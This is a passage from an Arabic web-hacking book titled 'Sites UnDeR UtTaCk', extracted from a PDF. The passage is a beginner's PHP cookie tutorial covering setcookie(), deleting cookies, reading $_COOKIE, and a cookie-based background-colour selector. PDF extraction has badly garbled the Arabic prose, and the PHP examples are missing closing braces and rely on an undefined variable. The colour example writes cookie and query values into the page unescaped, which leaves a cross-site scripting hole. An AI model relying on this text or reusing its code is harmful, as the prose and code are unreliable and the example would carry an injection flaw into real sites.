‫ﺘﻲﺗﺰورﻫﺎﺑﺈﯾﺪاﻋﻬﺎ ﻋﻠﻰاﻟﻘ ﺮ صاﻟﺼﻠﺐﻓﻲ‬ ‫ﻗﻊاﻟ‬‫ﻣﻠﻔﺎ تاﻟﻜﻮﻛﯿﺰ ﻋﺒﺎرة ﻋﻦ ﻣﻠﻔﺎ ت ﻧﺼﯿﺔ ‪،‬ﺗﻘﻮماﻟﻤﻮا‬
‫ﺘ ﺮﺟﻌﻬﺎ ﻋﻨﺪاﻟ ﺤﺎﺟﺔ ‪،‬‬
‫ﻗﻊاﻟﺬيأودﻋﻬﺎأن ﯾﺴ‬
‫ﺘﯿﺢﻟﻠﻤﻮ‬
‫ﺘﻮيﻫﺬهاﻟﻤﻠﻔﺎ تاﻟﻨﺼﯿﺔ ﻋﻠﻰ ﻣﻌﻠﻮﻣﺎ تﺗ‬ ‫ﺟﻬﺎزك ‪ ،‬وﺗ ﺤ‬
‫ﻗﻊ ‪.‬‬‫ﺄي ﻋﻨﺪ زﯾﺎرﺗﻚاﻟﻤﻘﺒﻠﺔﻟﻠﻤﻮ‬

‫ﻗﻊ‬ ‫ﻗﻊ ﻵ ﺧ ﺮ ‪ ،‬وﻟﻜﻦﻟﯿ ﺲﺑﺈﻣﻜﺎنﻫﺬهاﻟﻤﻮا‬


‫ﺘﻲﺗﺨﺰن ﺿﻤﻦ ﻣﻠﻔﺎ ت ﺎﻟﻜﻮﻛﯿﺰ ﻣﻦ ﻣﻮ‬ ‫ﺘﻠ ﻒاﻟﻤﻌﻠﻮﻣﺎ تاﻟ‬‫ﻮﺗﺨ‬
‫ﺘﺜﻨﺎ ءﺗﻠﻚاﻟﻤﻌﻠﻮﻣﺎ تاﻟﻤﺨﺰﻧﺔﻓﻲاﻟﻤﻠ ﻒاﻟﻨﺼﻲ‬ ‫ﺘ ﺮﺟﺎ عأي ﻣﻌﻠﻮﻣﺎ تإ ﺿﺎﻓﯿﺔ ﻋﻨﻚﺄو ﻋﻦ ﺟﻬﺎزك ‪،‬ﺑﺎﺳ‬ ‫اﺳ‬
‫ﻗﻊاﻻ ﻃﻼ ع ﻋﻠﻰ ﻣ ﻀﻤﻮن ﻣﻠﻔﺎ ت‬
‫ﺘﻄﯿﻊﻫﺬهاﻟﻤﻮا‬ ‫ﻗﻊ ‪ ،‬وﺑﺬﻟﻚﻻﺗﺴ‬ ‫ﺘﻲﺗﻢإرﺳﺎﻟﻬﺎ ﻣﻦﻗﺒ ﻞاﻟﻤﻮ‬ ‫اﻟﺨﺎ صﺑﻬﺎ ‪ ،‬واﻟ‬
‫ﺎﻟﻜﻮﻛﯿﺰاﻷ ﺧ ﺮى ‪،‬أوأي ﻣﻠﻔﺎ ت ﺧﺎ ﺻﺔ ﻋﻠﻰ ﺟﻬﺎزك ‪.‬‬

‫ﺘﻢإﯾﺪا ع ﻣﻠﻔﺎ ت ﺎﻟﻜﻮﻛﯿﺰ ﻋﻠﻰ ﺟﻬﺎزك ؟‬‫‪-‬ﻛﯿ ﻒ ﯾ‬


‫ﺘ ﻀﻤﻨﺎ‬
‫ً‬ ‫ﻗﻊاﻟﺬي ﺣﺪدﺗﻪ ‪ ،‬ﻣ‬ ‫ًإﻟﻰاﻟﻤﻮ‬‫ﻗﻊﻓﻲ ﺷ ﺮﯾﻂاﻟﻌﻨﺎوﯾﻦ ‪ ،‬ﻃﻠﺒﺎ‬ ‫ﺘﺼﻔﺢ ‪ ،‬ﻋﻨﺪإد ﺧﺎﻟﻚ ﻋﻨﻮان ﻣﻮ‬ ‫ﯾ ﺮﺳ ﻞاﻟﻤ‬
‫ّنﻫﺬه‬ ‫ﺘﺸﻐﯿ ﻞاﻟﺬي ﯾﺪﯾ ﺮ ﺟﻬﺎزك ‪.‬ﺗﺨﺰ‬ ‫ﺘﺨﺪﻣﻪ ‪ ،‬وﻧﻈﺎماﻟ‬ ‫ﺘﺼﻔﺢاﻟﺬيﺗﺴ‬ ‫ﻋﻨﻮان ‪ IP‬ﺎﻟﺨﺎ صﺑﻪ ‪ ،‬وﻧﻮ عاﻟﻤ‬
‫ﺘﻢإرﺳﺎﻟﻬﺎ ‪ .‬وﻓﻲ‬ ‫ﺘﻲ ﯾ‬‫ﻗﺔﻟﻠﻜﻮﻛﯿﺰﺑﺎﻟﻤﻌﻠﻮﻣﺎ تاﻟ‬ ‫اﻟﻤﻌﻠﻮﻣﺎ تﻓﻲ ﻣﻠﻔﺎ ت ﺧﺎ ﺻﺔﺑﺎﻟﻤﺰود ‪ Log Files ،‬ﻮﻻ ﻋﻼ‬
‫ﺘﻢﺈرﺳﺎﻟﻬﺎ ﻣﻊ‬ ‫ﻗﻊاﻟﻤﻄﻠﻮب ‪،‬ﻓﺈذا وﺟﺪﻫﺎ ﯾ‬ ‫ﺘﻲﺗﺨ ﺺاﻟﻤﻮ‬ ‫ﺘﺼﻔﺢ ﻋﻦ ﻣﻠﻔﺎ تﻛﻮﻛﯿﺰ ‪،‬اﻟ‬ ‫ﻗ ﺖﺬاﺗﻪ ﯾﺒ ﺤﺚاﻟﻤ‬ ‫اﻟﻮ‬
‫ﻗﻊ ﺳﯿﺪركأنﻫﺬه زﯾﺎرﺗﻚ ﺎﻷوﻟﻰإﻟﯿﻪ ‪،‬ﻓﯿﻘﻮمﺑﺈرﺳﺎ ل ﻣﻠﻔﺎ ت‬ ‫ﻗﻊ ‪ ،‬وإذاﻟﻢﺗﻮﺟﺪ ‪،‬ﻓﺈناﻟﻤﻮ‬ ‫ﻃﻠﺐ ﻣﺸﺎﻫﺪةاﻟﻤﻮ‬
‫ﺘﺨﺰن ﻋﻠﯿﻪ ‪.‬‬ ‫اﻟﻜﻮﻛﯿﺰإﻟﻰ ﺟﻬﺎزكﻟ‬

‫‪١ ٢١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻗﻊﺗﻐﯿﯿ ﺮاﻟﻤﻌﻠﻮﻣﺎ تاﻟﻤﻮﺟﻮدة ﺿﻤﻦ ﻣﻠﻔﺎ تاﻟﻜﻮﻛﯿﺰأوإ ﺿﺎﻓﺔ ﻣﻌﻠﻮﻣﺎ ت ﺟﺪﯾﺪةﻛﻠﻤﺎﻗﻤ ﺖﺑﺰﯾﺎرة‬ ‫ﻮﺑﺈﻣﻜﺎناﻟﻤﻮ‬
‫ﻗﻚ‬‫ﺘﻢﺗﺨﺰﯾﻦﺑﻌ ﺾ ﻣﻠﻔﺎ تاﻟﻜﻮﻛﯿﺰﻓﻲاﻟﺬاﻛ ﺮةﻓﻘﻂ ‪،‬ﺑ ﺤﯿﺚ ﯾﺠ ﺮي ﺣﺬﻓﻬﺎ ﻣﺒﺎﺷ ﺮة ﻋﻨﺪإﻏﻼ‬ ‫ﻗﻊ ‪ .‬ﯾ‬
‫اﻟﻤﻮ‬
‫ﺘ ﺮة ﻣ ﺤﺪدة ﻋﻠﻰاﻟﻘ ﺮ صاﻟﺼﻠﺐ‬ ‫ﺘﻢﺗﺨﺰﯾﻨﻬﺎﻟﻔ‬ ‫ﺘﺼﻔﺢ ‪ ،‬وﻟﻜﻦ ﻣﻌﻈﻤﻬﺎ وﺗﺴﻤﻰ "ﻣﻠﻔﺎ تاﻟﻜﻮﻛﯿﺰاﻟﻤﺜﺎﺑ ﺮة"‪ ،‬ﯾ‬ ‫اﻟﻤ‬
‫ﺘﻲ‬ ‫ﺘﻰ ﺳﻨﻮا ت ‪.‬أﻣﺎﺑﻌ ﺾ ﻣﻠﻔﺎ تاﻟﻜﻮﻛﯿﺰاﻟ‬ ‫ﺘﻬﺎ ﻣﺪةﺄﺷﻬ ﺮأو ﺣ‬ ‫ﻗﺪﺗﺪوم ﺻﻼ ﺣﯿ‬ ‫ﺘﻬﺎ و‬
‫ﺘﻬﺎ ء ﺻﻼ ﺣﯿ‬ ‫ﻟ ﺤﯿﻦاﻧ‬
‫ﱠن ﻋﻠﻰﻗ ﺮ ﺻﻚاﻟﺼﻠﺐ ‪ .‬وﺗﻌﻮد‬ ‫ُﺨﺰ‬‫ُ ﺤﺬ ف ﻣﺒﺎﺷ ﺮة وﻻﺗ‬‫ﺘﺎرﯾ ﺦ ﺳﺎﺑ ﻖ ‪،‬ﻓﺈﻧﻬﺎﺗ‬‫ﺗﻌ ﺮ ضﺗﺎرﯾ ﺦ ﺻﻼ ﺣﯿﺔﻟ‬
‫ﻗﺪﺗﻌﻤﻢﺑﻌ ﺾاﻟﺸ ﺮﻛﺎ ت‬ ‫ﻗﻊاﻟﺬيأﺻﺪرﻫﺎﻓﻘﻂ ‪ ،‬و‬ ‫اﻟﻤﻌﻠﻮﻣﺎ تاﻟﻤﺨﺰﻧﺔﻓﻲ ﻣﻠﻔﺎ تاﻟﻜﻮﻛﯿﺰإﻟﻰ ﻣﺰودا تاﻟﻤﻮ‬
‫ﺘ ﻀﻤﻨﺔ ‪ ،‬وﻟﻜﻲ ﻻﺗﺼﺪر‬ ‫ﺘﻨﺴﯿ ﻖاﻟﻤﻌﻠﻮﻣﺎ تاﻟﻤ‬‫ﺘﻲﺗﺼﺪرﻫﺎ ﻋﻠﻰ ﺟﻤﯿﻊ ﻣﺰوداﺗﻬﺎ ‪،‬ﻟ‬ ‫اﻟﻜﺒ ﺮى ﻣﻠﻔﺎ ت ﺎﻟﻜﻮﻛﯿﺰاﻟ‬
‫ﻗﻊ‪.‬‬‫ﺘﻠﻔﺔﻓﻲاﻟﻤﻮ‬ ‫ﺘﺨﺪم ذاﺗﻪ ‪ ،‬ﻋﻨﺪ زﯾﺎرﺗﻪﻟﺼﻔ ﺤﺎ ت ﻣﺨ‬ ‫ﻛ ﻞ ﻣﻦ ﻣﺰوداﺗﻬﺎ ﻣﻠﻔﺎ تﻛﻮﻛﯿﺰﻟﻠﻤﺴ‬

‫‪-‬ﻣﻜﻮﻧﺎ ت ﻣﻠ ﻒاﻟﻜﻮﻛﯿﺰ ‪:‬‬


‫^^^^^^^^^^^^^^‬
‫ﻗﻊاﻟﻤﺎﻟﻚﻟﻪ ‪...‬‬
‫ﺘﻬﺎ ء ﻣﻔﻌﻮﻟﻪ ‪،‬اﻟﻤﻮ‬
‫ﺘﻪ ‪،‬ﺗﺎرﯾ ﺦاﻧ‬
‫ﺘﻜﻮن ﻋﺎدة ﻣﻦ ﻋﺪةاﺟﺰا ء ﻫﻲاﺳﻢاﻟﻤﻠ ﻒ ‪،‬ﻗﯿﻤ‬ ‫ﯾ‬

‫ﺰراﻋﺔاﻟﻜﻌﻜﺎ ت ﻋﻠﻰ ﺟﻬﺎز ﺎﻟﻌﻤﯿ ﻞ‪-:‬‬


‫ﺄوﻻ ‪:‬ﻛﯿ ﻒﺗﺰر ع ﻣﻠﻔﺎ تاﻟﻜﻌﻜﺎ ت ‪:‬‬
‫ﺘﺎﻟﻲ ‪:‬‬
‫ﺘﺨﺪاماﻟﺪاﻟﺔ ‪ setcookie‬ﻮﺗﻌ ﺮﯾﻔﻬﺎﺑﺎﻟﺸﻜ ﻞاﻟ‬ ‫ﺘﻢ ذﻟﻚﺑﺎﺳ‬
‫ﯾ‬

‫‪code:‬‬

‫‪boolean setcookie ( string name [, string value [, int expire‬‬

‫)]]]]]‪[, string path [, string domain [, int secure‬‬

‫ﺗﻬﻤﻨﺎاﻟﻤﺪ ﺧﻼ تاﻟﺜﻼ ثاﻻوﻟﻰ ﻮ ﻫﻲ ‪:‬‬


‫ﺘﺼﻔﺢ وا ﺣﺪ و ﻋﻨﺪﻫﺎ ﯾﺼﺒﺢاﻻﺳﻢ ﻫﻮ‬
‫‪name :‬ﺎياﺳﻢاﻟﻜﻌﻜﺔ ‪...‬ﻓﺒﺎﻣﻜﺎﻧﻚارﺳﺎ لاﻛﺜ ﺮ ﻣﻦﻛﻌﻜﺔاﻟﻰ ﻣ‬
‫ﺘﻤﯿﯿﺰ ‪.‬‬
‫اﻟﻄ ﺮﯾﻘﺔاﻟﻮ ﺣﯿﺪةﻟﻠ‬

‫ﺘﺒﻪﺑﺎﻣﻜﺎﻧﻚ‬
‫‪value :‬ﺎﻟﻘﯿﻤﺔ ‪...‬ﻓﻘﻂﻗﯿﻢ ﻧﺼﯿﺔ ‪...‬ﻻ ﯾﻤﻜﻨﻚ و ﺿﻊ ﻣﺼﻔﻮﻓﺔﻛﻘﯿﻤﺔ وﻫﺬاأاﻣ ﺮ ﻣﻬﻢ ‪...‬ﻟﻜﻦاﻧ‬
‫ﺘﻐﯿ ﺮﻓﻲﺑﻲاﺗ ﺶ‬‫ﺘ ﺤﻮﯾ ﻞاي ﻣ‬ ‫ﺘﺨﺪماﻟﺪاﻟﺔ ‪serialize‬ﻟ‬
‫و ﺿﻊ ﻣﺼﻔﻮﻓﺔﻟﻜﻦﺑﻄ ﺮﯾﻘﺔا ﺧ ﺮى ‪ ...‬؟ﻛﯿ ﻒ ؟ ‪:‬اﺳ‬
‫ﺘﺨﺪم ‪ unserialize‬ﻻﻋﺎدﺗﻪاﻟﻰاﻟﺸﻜ ﻞاﻟﻄﺒﯿﻌﻲ‪.‬‬ ‫ﺑﻲاﻟﻰ ﺷﻜ ﻞ ﻧﺼﻲ و ﻣﻦﺛﻢاﺳ‬

‫ﺘﺼﻔﺢ‬‫ﺘﻲﺑﻌﺪﻫﺎ ﺳﯿﻘﻮماﻟﻤ‬ ‫‪expire :‬ﺎي ﻋﺪداﻟﺜﻮاﻧﻲ ﻣﻦﺑﺪﯾﺔ ﻋﺼ ﺮاﻟﯿﻮﻧﻜ ﺲ ) ‪ ١‬ﯾﻨﺎﯾ ﺮ ‪ ( ١٩٧٠‬واﻟ‬


‫ﺘﺨﺪمﺑ ﺤﺬ فاﻟﻜﻌﻜﺔ ‪ ...‬و ﻫﻨﺎﺛﻼ ث ﺣﺎﻻ ت‪:‬‬ ‫ﻋﻠﻰ ﺟﻬﺎزاﻟﻤﺴ‬
‫ﻗ ﺖاﻟ ﺤﺎﻟﻲ ﻋﻠﻰ ﺟﻬﺎز ﺎﻟﻌﻤﯿ ﻞ و ﻋﻨﺪﻫﺎﺗﺨﺰناﻟﻜﻌﻜﺔ‬‫ﻗ ﺖاﻟﻤﻌﻄﻰﻛﻤﺪ ﺧ ﻞاﻛﺜ ﺮ ﻣﻦاﻟﻮ‬ ‫ً ‪:‬أن ﯾﻜﻮناﻟﻮ‬ ‫>‪--‬ﺄوﻻ‬
‫ﻋﻠﻰ ﺟﻬﺎزاﻟﻌﻤﯿ ﻞ وﺗ ﺤﺬ ف ﻋﻨﺪاﻧﻘ ﻀﺎ ءاﻟﻤﺪة ‪.‬‬

‫‪١ ٢٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺼﻔﺢ ﻋﻠﻰ‬ ‫ﻗ ﺖ ﻋﻠﻰ ﺟﻬﺎزاﻟﻌﻤﯿ ﻞ و ﻋﻨﺪﻫﺎ ﻻ ﯾﻘﻮم ﺎﻟﻤ‬ ‫ﻗ ﻞ ﻣﻦاﻟﻮ‬‫ﻗ ﺖاﻟﻤﻌﻄﻰﻛﻤﺪ ﺧ ﻞا‬‫ً ‪:‬أن ﯾﻜﻮناﻟﻮ‬‫ﺛﺎﻧﯿﺎ‬
‫>‪--‬‬
‫ﺘﻬﻲاﻟﻤﺪة ‪.‬‬ ‫ﺘﻰﻟﻮﻟﻢﺗﻨ‬ ‫ﺘﺨﺰﯾﻨﻬﺎ واذا وﺟﺪ تﻛﻌﻜﺔﺑﻨﻔ ﺲاﻻﺳﻢﻓﺎﻧﻪ ﯾ ﺤﺬﻓﻬﺎ ﺣ‬ ‫ﺟﻬﺎزاﻟﻌﻤﯿ ﻞﺑ‬
‫ﻗﻊ ‪.‬‬
‫ﺘﺨﺪماﻟﻤﻮ‬ ‫ﺘﺼﻔﺢ وﺗﻔﻘﺪ ﺣﺎﻟﻤﺎ ﯾﻐﻠ ﻖاﻟﻤﺴ‬ ‫ﺘﺎﻓﺎناﻟﻜﻌﻜﺔﺗﺨﺰنﻓﻲ ذاﻛ ﺮة ﺎﻟﻤ‬ ‫ﻗ‬‫ً ‪:‬إذاﻟﻢﺗ ﺤﺪد و‬
‫ﺛﺎﻟﺜﺎ‬
‫>‪--‬‬

‫ﻣﺜﺎ ل ‪:‬‬
‫‪code:‬‬

‫?<‬

‫;)‪setcookie('site','http://www.palhackerz.com/',time()+3600‬‬

‫>?‬

‫ﻗ ﺖاﻟ ﺤﺎﻟﻲ ﻋﻠﻰ ﺷﻜ ﻞ ﻋﺪداﻟﺜﻮاﻧﻲ ﻣﻦﺑﺪاﯾﺔ ﻋﺼ ﺮاﻟﯿﻮﻧﻜ ﺲ‬


‫ﺘﻲﺗ ﺮﺟﻊاﻟﻮ‬
‫ﻣﻦاﻟﺪوا لاﻟﻤﻔﯿﺪة داﻟﺔ ‪ time‬واﻟ‬
‫)‪ ١‬ﯾﻨﺎﯾ ﺮ ‪.(١٩٧٠‬‬

‫ﺛﺎﻧﯿﺎﻛﯿ ﻒﺗ ﺤﺬ فاوﺗﻌﺪ لﻛﻌﻜﺔ‪:‬‬


‫ﻗ ﺖ ﻋﻠﻰ ﺟﻬﺎز‬
‫ﻗ ﻞ ﻣﻦاﻟﻮ‬
‫ﻗ ﺖا‬
‫ﻟﻜﻲﺗ ﺤﺬ فﻛﻌﻜﺔ ﻋﻠﯿﻚأنﺗ ﺮﺳ ﻞﻛﻌﻜﺔﺑﻨﻔ ﺲ ﺎﻻﺳﻢ و ﺧﺎﻟﯿﺔاﻟﻘﯿﻤﺔ و ذا ت و‬
‫ﺘﺨﺪم‬‫اﻟﻤﺴ‬

‫ﻣﺜﺎ ل‪:‬‬
‫‪code:‬‬

‫?<‬

‫;)‪setcookie('site','',time()-360000‬‬

‫>?‬

‫ﻣﻼ ﺣﻈﺎ ت ‪:‬‬


‫ﻗﯿ ﺖﺑﯿﻦاﻟﺨﺎدم واﻟﻌﻤﯿ ﻞ ‪.‬‬
‫ﺘﻮ‬‫ﺘﻔﺎدىﻓﺎر قاﻟ‬‫ًاﺟﻌﻠﻪﻗﯿﻤﺔﻛﺒﯿ ﺮةﻟﻜﻲﺗ‬ ‫‪ -١‬ﻋﻨﺪﻣﺎﺗ ﺤﺪد زﻣﻨﺎ ﻣﺎ ﺿﯿﺎ‬
‫‪-٢‬ﻟﻜﻲﺗﻌﺪ لأيﻛﻌﻜﺔ ﻋﻠﯿﻚ ﺣﺬﻓﻬﺎ وإرﺳﺎﻟﻬﺎ ﻣﻦ ﺟﺪﯾﺪ ‪.‬‬

‫ﻣﻼ ﺣﻈﺔ ﻣﻬﻤﺔ ‪:‬‬


‫ﺘﺎﻟﻲﻟﻦ ﯾﻨﺠﺢ‬
‫ﺘﺼﻔﺢ ‪..‬ﻓﻤﺜﻼاﻟﻜﻮداﻟ‬
‫ﺘﺪﻋﻲاﻟﺪاﻟﺔ ‪setcookie‬ﻗﺒ ﻞأنﺗ ﺮﺳ ﻞاي ﺷﻲ ءاﻟﻰاﻟﻤ‬ ‫ﯾﺠﺐانﺗﺴ‬
‫‪:‬‬
‫‪code:‬‬

‫‪١ ٢٣‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

<html>

<body>

<?

setcookie('site','palhackerz.com',time()+20000);

echo " Alfjr.com : the best islamic forum";

?>

</body>

</html>

setcookie ...‫ﺑ ﻞﻟﻮﻛﺎن ﻫﻨﺎﻟﻚ ﻣﺠ ﺮد ﺳﻄ ﺮﻓﺎر غﻗﺒ ﻞ ﻋﻼﻣﺔاﻟﺒﺪاﯾﺔ ؟ >ﻓﻠﻦﺗﻌﻤ ﻞاﻟﺪاﻟﺔ‬

: ‫ﺎﻟﻤﺜﺎ لاﻟﺴﺎﺑ ﻖﻛﺎن ﻣﻦاﻟﻤﻤﻜﻦان ﯾﻜﻮن‬


code:

<? setcookie('site','palhackerz.com',time()+20000);

?>

<html>

<body>

<? echo " palhackerz.com : the best Hacking forum"; ?>

</body>

</html>

١ ٢٤
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻗ ﺮا ءةاﻟﻜﻌﻜﺎ ت ﻣﻦ ﺟﻬﺎز ﺎﻟﻌﻤﯿ ﻞ‪:‬‬

‫ﺘﻐﯿ ﺮا ت ﻣﻦاﻟﻜﻌﻜﺔ ‪-:‬‬


‫ﺘﻘﺒ ﻞاﻟﻤ‬
‫‪-‬ﻛﯿ ﻒﺗﺴ‬
‫^^^^^^^^^^^^^^^^^^^^^‬
‫ﺘﺼﻔﺢ وا ﺣﺪ ‪..‬‬ ‫ﻗﻠﻨﺎﺑﺎﻧﻪﺑﺎﻣﻜﺎﻧﻚ ﺎرﺳﺎ لاﻛﺜ ﺮ ﻣﻦﻛﻌﻜﺔاﻟﻰ ﻣ‬
‫ﺘﻲﻗﻤ ﺖ‬ ‫ﺘﺼﻔﺢ ﯾﻘﻮمﺑﺎرﺳﺎ ل ﺟﻤﯿﻊاﻟﻜﻌﻜﺎ تاﻟ‬
‫ﻗﻌﻚﻓﺎناﻟﻤ‬ ‫ِ ﺻﻔ ﺤﺔ ﻋﻠﻰ ﻣﻮ‬‫ﺘﺼﻔ ﺤﻪ‬‫ﺘﺨﺪم ﻣﻦ ﻣ‬ ‫ﻋﻨﺪﻣﺎ ﯾﻄﻠﺐاﻟﻤﺴ‬
‫ﺘﺨﺪم ‪... PHP‬ﺗﺴﻬ ﻞ ﻋﻠﯿﻚﻗ ﺮا ءةﻫﺬهاﻟﻜﻌﻜﺎ ت وﺗﺨﺰﻧﻬﺎﻓﻲ ﻣﺼﻔﻮﻓﺔاﺳﻤﻬﺎ‬ ‫ﺘﻬﺎ ﻋﻨﺪاﻟﻤﺴ‬ ‫اﻧ ﺖﺑﺰراﻋ‬
‫ﺘﺎ ح ﻫﻮاﺳﻢاﻟﻜﻌﻜﺔ و‬ ‫‪COOKIE_$‬ﻮ ﻫﻲ ﻣﺼﻔﻮﻓﺔ ﻣﻦاﻟﻨﻮ ع ‪Associative Arrays‬ﺑ ﺤﯿﺚاناﻟﻤﻔ‬
‫ﺘﻬﺎ ‪.‬‬
‫اﻟﻘﯿﻤﺔﻗﯿﻤﺔ ﺎﻟﻜﻌﻜﺔﻛﻤﺎارﺳﻠ‬

‫ﻣﺜﺎ ل ‪:‬‬
‫‪code:‬‬

‫?<‬

‫;]'‪echo $_COOKIE['site‬‬

‫>?‬

‫ﻮ ﻫﺬهﺗﻄﺒﻊ ‪:‬‬
‫‪code:‬‬

‫‪palhackerz.com‬‬

‫ﺗﻄﺒﯿ ﻖ ‪:‬ﺗﺨﺼﯿ ﺺﻟﻮناﻟﺨﻠﻔﯿﺔ‬


‫ﺘﺨﺪم ﺎﻟﻜﻌﻜﺎ تﻟﻜﻲ ﻧ ﺤﻔﻆﻟﻮناﻟﺨﻠﻔﯿﺔاﻟﻤ ﺤﺒﺒﺔاﻟﻰاﻟﺸﺨ ﺺ‬
‫ﻗﻊ ﻣﺒﺴﻂ و ﻧﺴ‬
‫ﻛﻤﺜﺎ لﺑﺴﯿﻂ دﻋﻨﺎ ﻧﻘﻮمﺑﺎﻧﺸﺎ ء ﻣﻮ‬
‫‪..‬‬

‫‪ -‬ﻣﺎذاﻟﺪﯾﻨﺎ ؟‬
‫ﺘﯿﻦ ‪:‬‬ ‫‪-١‬اﻟﻤﻠ ﻒ ‪ user.php :‬ﯾﻘﻮماﻟﻤﻠ ﻒﺑﻌﻤﻠﯿ‬
‫ﺘﺎرهاﻟﺰاﺋ ﺮ ‪.‬‬
‫>‪--‬ﺎﻻوﻟﻰ ‪:‬ﺗ ﺤﺪﯾﺪاﻟﻠﻮناﻟﺬي ﺎ ﺧ‬
‫ﺘﺎر‬
‫ﺘﯿﺎراﻟﻠﻠﻮن و ﺣﻔﻆاﻟﻠﻮن ﺎﻟﻤﺨ‬ ‫>‪--‬ﺎﻟﺜﺎﻧﯿﺔ ‪ :‬ﻋ ﺮ ض ﻧﻤﻮذجا ﺧ‬

‫ﺘﻔﯿﺪ ﻣﻦ ﺧﺪﻣﺎ تاﻟﻤﻠ ﻒ‪user.php .‬‬


‫ﺘﻲﺗﺴ‬
‫ﻗﻊ واﻟ‬
‫‪-٢‬اﻟﻤﻠ ﻒ ‪index.php‬ﺈ ﺣﺪى ﺻﻔ ﺤﺎ تاﻟﻤﻮ‬

‫ﻮإﻟﯿﻚاﻟﻜﻮداﻟﺨﺎ صﺑﻜ ﻞ ﻣﻠ ﻒ ‪:‬‬


‫‪ -١‬ﺎﻟﻤﻠ ﻒ‪user.php :‬‬
‫‪code:‬‬

‫‪١ ٢٥‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

<?

/*-----------------------

Cookies-Based Background Selector..

Created By : "Rasha"<rasha@h4palestine.com>

For : h4palestine.com

-------------------------*/

function display_form(){

?>

<html>

<body>

<!-- Color setting Form -->

<form name=color_select method="GET">

<INPUT type="hidden" name="do" value="set_color">

<INPUT name="color" type="text" value="

<? echo get_color(); ?>">

> "‫<ﺎ ﺣﻔﻆاﻟﻠﻮن‬INPUT type="submit" value="

</FORM>

<!-- Color Clearing Form -->

<form name=color_clear method="GET">

<INPUT type="hidden" name="do" value="clear_color">

١ ٢٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

> "‫ﺘﺬﻛ ﺮﻟﻮﻧﻲاﻟﻤﻔ ﻀ ﻞ‬


‫<ﻻﺗ‬INPUT type="submit" value="

</FORM>

<?

function set_color(){

global $_GET;

setcookie('color',$_GET['color'],time()+36000);

header('Location:index.php');

function get_color(){

global $_COOKIE;

if(isset($_COOKIE['color'])){

return $_COOKIE['color'];

}else{

return "#FFFFFF";

١ ٢٧
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫{)(‪function clear_color‬‬

‫;)‪setcookie('color',$_GET['color'],time()-36000‬‬

‫;)'‪header('Location:index.php‬‬

‫}‬

‫‪// selection‬‬

‫{)'‪if ($do=='display_form‬‬

‫;)(‪display_form‬‬

‫{)"‪}elseif ($do=="set_color‬‬

‫;)(‪set_color‬‬

‫{)"‪}elseif ($do=="clear_color‬‬

‫;)(‪clear_color‬‬

‫}‬

‫>?‬

‫ﺘﯿﺎراﻟﻠﻮن ‪.‬‬‫‪-‬ﺎﻟﺪاﻟﺔاﻻوﻟﻰ ‪display_form‬ﺗﻘﻮمﻓﻘﻂﺑﻌ ﺮ ض ﻧﻤﻮذجا ﺧ‬


‫ﺘﺨﺪماﻟﻰاﻟﺼﻔ ﺤﺔاﻟ ﺮﺋﯿﺴﯿﺔ ‪.‬‬‫ﺘﺎرﻓﻲﻛﻌﻜﺔ وﺗ ﺮﺟﻊاﻟﻤﺴ‬ ‫‪-‬ﺎﻟﺪاﻟﺔاﻟﺜﺎﻧﯿﺔ ‪set_color‬ﺗﻘﻮمﺑ ﺤﻔﻆاﻟﻠﻮن ﺎﻟﻤﺨ‬
‫‪-‬ﺎﻟﺪاﻟﺔاﻟﺜﺎﻟﺜﺔ ‪get_color‬ﺗ ﺮﺟﻊﻗﯿﻤﺔاﻟﻠﻮن ﻣﻦاﻟﻜﻌﻜﺔ واذاﻟﻢ ﯾﻜﻦﻫﻨﺎﻟﻚﻗﯿ ﻤﺔﻓﺎﻧﻬﺎﺗ ﺮﺟﻊﻟﻮن‬
‫ﺘ ﺮا ﺿﻲ وﻫﻮاﻻﺑﯿ ﺾ ‪.‬‬ ‫ﺎﻓ‬
‫ﺘﻲ ذﻛ ﺮﻧﺎﻫﺎﻓﻲاﻟﺪرس ‪.‬‬ ‫‪-‬ﺎﻟﺪاﻟﺔاﻟ ﺮاﺑﻌﺔ ‪clear_color‬ﺗﻘﻮمﺑﻤﺴﺢاﻟﻜﻌﻜﺔﺑﺎﻟﻄ ﺮﯾﻘﺔ ﺎﻟ‬

‫ـ ‪index.php :‬‬ ‫‪ -٢‬ﻣﻠ ﻒاﻟ‬


‫ًاﻻاﻧﻪ ﯾﻄﻠﺐاﻟﺪاﻟﺔ ‪ get_color‬ﻣﻦ ﻣﻠ ﻒ ‪user.php‬ﻛﻤﺎ ﯾﻠﻲ ‪:‬‬
‫ﻣﻠ ﻒ ﻋﺎدي ﺟﺪا‬

‫‪١ ٢٨‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

code:

<html>

<BODY bgcolor="<? include('user.php');

echo get_color() ?>">

</h1> ..... ‫<ﻣ ﺮ ﺣﺒﺎﺑﻚ‬h1>

<br>

‫ﯾﻤﻜﻨﻚﺗﺨﺼﯿ ﺺﻟﻮناﻟﺨﻠﻔﯿﺔ ﻣﻦﻫﻨﺎ‬

<br>

</a> ‫< ﺻﻔ ﺤﺔﺗﺨﺼﯿ ﺺاﻟﻠﻮن‬a href="user.php?do=display_form">

</body>

</html>

..…

١ ٢٩
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﻣﻌﻠﻮﻣﺎت ﻣﻬﻤﺔ ﻋﻦ اﳌﻮاﻗﻊ اﻟﱵ ﺗﺪﻋﻢ اﻟﻔﺮوﻧﺖ ﺑﯿﺞ "‬

‫‪$$$$$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪T.O.L. ( DeXXa ) :‬‬
